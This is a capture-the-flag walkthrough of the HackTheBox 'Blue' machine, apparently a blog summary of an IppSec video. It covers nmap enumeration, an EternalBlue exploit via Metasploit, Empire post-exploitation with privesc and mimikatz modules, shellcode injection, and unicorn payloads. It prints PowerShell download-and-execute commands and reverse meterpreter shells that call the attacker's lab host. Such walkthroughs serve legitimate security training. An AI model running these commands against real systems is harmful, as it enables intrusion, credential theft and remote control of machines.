Blue Hackthebox

Disassembly of IppSec’s youtube video HackTheBox - Blue. A crash course in NMAP and the strength it has in enumeration. Exploitation crash course with Metasploit & Empire, fixing unicode with xxd. Using unicorn to elevate meterpreter shell to stdapi.


Legal Usage: The information provided by [email protected] is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.

This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

Enumeration

1
nmap -sC -sV -oA nmap-scripts 10.10.10.40

-sC = default scripts -sV = enumerate versions -oA = ouput all formats nmap-scripts = saves file named nmap-scripts (results)

The Microsoft security bulletin for Eternal Blue is MS17-010 which allows an attacker to send a crafted SMB message to the service and execute remote code.

more information found at Microsoft secuity page: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

searching for MS17-010 nmap script

at first searching the box for “lue” as unaware if there is a lower case b or an upper case B and grepping for the nmap file extention “.nse$”. To then switching to the vulnerability code and grep for nmap file extention.

discovered the scripts exisits at */usr/share/nmap/scripts/smb=vuln-ms17-010.nse*

inspecting the nmap script

Moving to inspect the script and verify that the categories do include “safe”

1
less /usr/share/nmap/scripts/smb=vuln-ms17-010.nse

nmap scanning all “safe” scripts

To scan with all safe scripts against a target:

1
nmap -p 445 --script safe -Pn -n 10.10.10.40

-Pn = disable ping -n = disable DNS resolution

Running safe scripts will take quite a bit of time as it runs multiple scripts against the target.

searching nmap scripts&sorting

To continue searching what the all the “categories” are in the the nmap script folder:

1
grep -r categories /usr/share/nmap/scripts/*.nse

if we just want to see the “categories” we can search for everything between quotes:

1
grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP '".*?"'

sorting this list with sort:

1
grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP '".*?"' | sort -u

this a list of all types of scripts are available with nmap.

to grab just one “catergory” from above and show a list:

1
grep -r categories /usr/share/nmap/scripts/*.nse | grep default | awk -F '{print $1}'

Lists all the “default” scripts, which can be changed for any of the above types.

return to results from “safe” nmap

There is quite a bit of information that was returned.

returns the Eternal Blue “ms17-010” as “VULNERABLE”.

nmap with “vuln and safe”

To target this “safe” enumeration to include “vuln” syntax:

1
nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.40

Exploiting

Metasploit

I know of two ways to launch metasploit:

1
2
msfdb run # loads the postgress server as well.
msfconsole # stardard launching

Search for Eternal Blue - ms017-010

1
search ms17-010

Use exploit:

1
use exploit/windows/smb/ms17_010_eternalblue

show options;

1
show options

Set payload:

1
set payload windows/x64/meterpreter/reverse_tcp

Set LHOST

1
set LHOST tun0

Set RHOST

Exploit

1
exploit -j

meterpreter session opened!

List all sessions

1
sessions -i

Interact with shell

1
2
1
shell

EMPIRE Framework

Empire is a POST-exploitation windows tool.

in directory of choice /opt/Empire

1
git clone https://github.com/EmpireProject/Empire -b dev

development branch is recommened as there is better quality of life improvements

install empire

change directory to /setup and execute install.sh

1
./install.sh

hit [enter] for random password generation

execute empire

from /opt/Empire

1
./empire

help to figure out all the commands available:

setup listeners

This is the first command always run:

1
listeners

1
uselistener # tab a few times to see all the types of listerners

using the “http” listener

1
uselistener http

run info - similar to show options on msf

1
1
info

we need to change the host and port.

1
2
set Host http://10.10.14.16:443
set Port 443

10.10.14.16 is the local ip port 443 is normally allowed outside of firewalls

to start listener:

1
execute

back out of listener

1
back

generate powershell payload

1
launcher powershell http

On local box make a directory called /http and create a file name empire.ps1

1
vi empire.ps1

paste power shell output

using stagers

alternatively like launchers there are stagers

1
usestagers

we have duck, hta, bat, vbs, macros, macroless_msword files

sending empire.ps1

setup local http server

1
python -m SimpleHTTPServer 80

target meterpreter shell download file:

1
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.114.16/empire.ps1')"

verified that the file was send from the local web-server.

back out to main menu

1
2
back
agents

our target machine is now hooked. Empire is different in that based off the delay is when our target contacts the “mothership” to retrieve commands.

To change the frequency/delay

1
2
3
sleep
sleep all 1
agents 

interacting with agents

1
interact M9N3T5HS

show modules (tab x2) lists all available modules

1
usemodule

empire privesc module

1
usemodule privesc/

1
2
usemodule privesc/powerup/allchecks
execute

job will start once the agent pulls back to the “mothership” empire CnC server. Will show the results in the window when it has finished.

mimikatz module

head back one level and help

1
2
back
help

alternatively, use searchmodule

1
searchmodule mimikatz

under mainly credentials

display empire running jobs

1
jobs

awaiting return of “allchecks”0

adding modules to Empire

for instance if you wanted to run the Sherlock.ps1 from @_Rastamouse github link: https://github.com/rasta-mouse/Sherlock

fixing unicode on a ps1 file

unicode issues exist on the first line of the file.

use xxd to create a hex verison of the Sherlock.ps1

1
xxd -ps Serlock.ps1 > Sherlock.ps1.hex

1
vi Serkock.ps1.hex

delete the first 6 characters

convert the hex back to ps1

1
xxd -r -ps Serlock.ps1.hex > Sherlock.ps1

1
less Sherlock.ps1

unicode issue has been resolved.

return to invoke “allchecks”

results from the “allchecks”

returned a significant number of results as we are already system with the exploit.

lost limit

This feature will continue to connect to agent and if lost for a certain specified time the client will uninstall.

Normally set to 4440 which is about 24hrs.

scriptcmd & scriptimport

cmd exeuctes a function that has been previously imported and import send s a new powershell script to keep in memory.

importing Sherlock.ps1

1
scriptimport /opt/win_privesc/Sherlock/Sherlock.ps1

run Sherlock.ps1

1
scriptcmd Find-AllVulns

Find-AllVulns is parameter inside the Sherlock.ps1

(results)

pass an object from Empire to Metasploit

Stated at this point this might get a bit tricky… Create a new meterpreter listener within Empire:

1
uselistener meterpreter

add the Host and Port and execute. go back and interact with previous session

Re-setup Metasploit ctrl+c to terminate

setup exploit handler

1
2
3
use exploit/multi/handler
set paytload windows/x64/meterpreter/reverse_http
show options

set LHOST and LPORT

back on Empire issue a ps command to list processes

1
ps

pick a process running as a particular user level.

head back to main and injectshellcode

1
injectshellcode meterpreter 1824

pid of the process we want to inject.

show info

1
1
info

set payload

1
2
set Payload reverse_http
execute

on Metasploit multi/handler session is received

seeing commands available

1
1
help

there should be a longer list of options to use but it was stated that this version of the exploit doesn’t support x64 and is more geared toward x86 system

spawning 32bit process

Empire:

1
2
usemodule managemetn/runas
info

set Cmd C:\windows\syswow64\cmd.exe

when attempting to execute the framework is asking for a Username or CredID.

IppSec workaround using unicorn: github link: https://github.com/trustedsec/unicorn

1
./unicorn --help

1
python unicorn.py windows/meterpreter/reverse_http 10.10.14.16 8002

Metasploit, background session and create 32bit handler and change LPORT

1
2
3
set paytload windows/meterpreter/reverse_http
set LPORT 8002
exploit -j

Empire, injectshellcode with 32bit change Port and Host

back and interact with agent

1
injectcode meterpreter1 2992 info

set LPORT as 8002

Successful response back to metasploit:

interact with session 3

1
sessions -i 3

1
1
help

still don’t have the standard api but we can attempt to load it manually.

1
load stdapi

msf at this point crashes

unicorn for the full stdapi

pivots to unicorn and an output code called powershell_attack.txt

send this file to our target with a simplehttpserver.

1
cp /opt/unicorn/powershell_attack.txt .

Empire, head back and use command “shell” which performs powershell commands.

1
shell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.16/powershell_attack.txt')

connection is established:

backgound our session 3 and enter session 4

1
2
ctrl+c
sessions -i 4

at this point we have full standard api functionality with all the bells and whistles.


If you don’t know who ippsec is check him out at https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

Twitter: https://twitter.com/ippsec